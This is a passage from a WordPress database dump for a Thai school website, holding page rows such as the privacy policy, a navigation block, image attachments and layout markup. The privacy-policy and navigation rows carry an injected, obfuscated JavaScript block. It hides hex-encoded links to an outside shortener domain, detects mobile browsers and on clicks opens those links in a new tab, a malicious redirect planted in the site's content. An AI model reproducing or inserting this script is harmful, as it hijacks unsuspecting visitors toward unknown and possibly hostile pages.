หรือลบข้อมูลส่วนตัวเมื่อใดก็ได้ (ยกเว้นพวกเขาไม่สามารถเปลี่ยนชื่อผู้ใช้ได้) ผู้ดูแลเว็บไซต์สามารถเห็นและแก้ไขข้อมูลเหล่านั้นได้เช่นกัน</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">คุณมีสิทธิ์อะไรบ้างกับข้อมูลของคุณ</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>หากคุณมีบัญชีบนเว็บนี้ หรือได้เคยแสดงความเห็นเอาไว้ คุณสามารถร้องขอไฟล์ส่งออกข้อมูลส่วนบุคคลที่เกี่ยวกับตัวคุณที่เราเก็บไว้ให้ส่งไปที่ทางคุณได้ รวมไปถึงข้อมูลใดๆ ที่คุณได้เคยให้ไว้กับเรา คุณสามารถที่จะร้องขอให้เราลบข้อมูลส่วนตัวเกี่ยวกับตัวคุณที่เราเก็บไว้ได้เช่นกัน แต่จะไม่รวมไปถึงข้อมูลใดๆ ที่เราจำเป็นจะต้องเก็บไว้สำหรับการจัดการ ข้อกฎหมาย หรือวัตถุประสงค์ในด้านมาตรการความปลอดภัย</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">ข้อมูลของคุณที่ส่งไปที่ไหน</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>ความเห็นของผู้เยี่ยมชมอาจถูกตรวจสอบผ่านบริการตรวจสอบสแปมอัตโนมัติ</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','นโยบายความเป็นส่วนตัว','','draft','closed','open','','นโยบาย-ความเป็นส่วนตัว','','','2024-07-27 09:28:22','2024-07-27 02:28:22','',0,'http://pakhaeng.ssk.in.th/?page_id=3',0,'page','',0),
(4,0,'2024-07-27 09:28:24','2024-07-27 02:28:24','<!-- wp:page-list /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','Navigation','','publish','closed','closed','','navigation','','','2024-07-27 09:28:24','2024-07-27 02:28:24','',0,'http://pakhaeng.ssk.in.th/index.php/2024/07/27/navigation/',0,'wp_navigation','',0),
(9,1,'2024-07-27 09:53:57','2024-07-27 02:53:57','','โรงเรียนบ้านหนองปลาเข็ง-กอไหล่','','inherit','','closed','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%9a%e0%b9%89%e0%b8%b2%e0%b8%99%e0%b8%ab%e0%b8%99%e0%b8%ad%e0%b8%87%e0%b8%9b%e0%b8%a5%e0%b8%b2%e0%b9%80%e0%b8%82%e0%b9%87','','','2024-07-27 09:53:57','2024-07-27 02:53:57','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านหนองปลาเข็ง-กอไหล่.png',0,'attachment','image/png',0),
(10,1,'2024-07-27 09:54:11','2024-07-27 02:54:11','','เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย','','inherit','','closed','','%e0%b9%80%e0%b8%9e%e0%b8%b4%e0%b9%88%e0%b8%a1%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b9%83%e0%b8%99%e0%b8%aa%e0%b9%88%e0%b8%a7%e0%b8%99%e0%b9%80%e0%b8%99%e0%b8%b7%e0%b9%89','','','2024-07-27 09:54:11','2024-07-27 02:54:11','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย.png',0,'attachment','image/png',0),
(11,1,'2024-07-27 09:54:15','2024-07-27 02:54:15','http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย.png','เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย','','inherit','','closed','','%e0%b9%80%e0%b8%9e%e0%b8%b4%e0%b9%88%e0%b8%a1%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b9%83%e0%b8%99%e0%b8%aa%e0%b9%88%e0%b8%a7%e0%b8%99%e0%b9%80%e0%b8%99%e0%b8%b7%e0%b9%89-2','','','2024-07-27 09:54:15','2024-07-27 02:54:15','',10,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย.png',0,'attachment','image/png',0),
(14,1,'2024-07-27 09:56:04','2024-07-27 02:56:04','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"9f7ee323\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1e35ff-0d\",\"thumbSize\":\"full\",\"ids\":[2039,2049],\"type\":\"slider\",\"imageRatio\":\"inherit\",\"gutter\":[26,\"\",\"\"],\"carouselHeight\":[600,\"\",\"\"],\"autoPlay\":true,\"transSpeed\":1240,\"imagesDynamic\":[{\"id\":2039,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2039\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"width\":2560,\"height\":1280},{\"id\":2049,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2049\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-scaled.png\",\"customLink\":\"\",\"linkTarget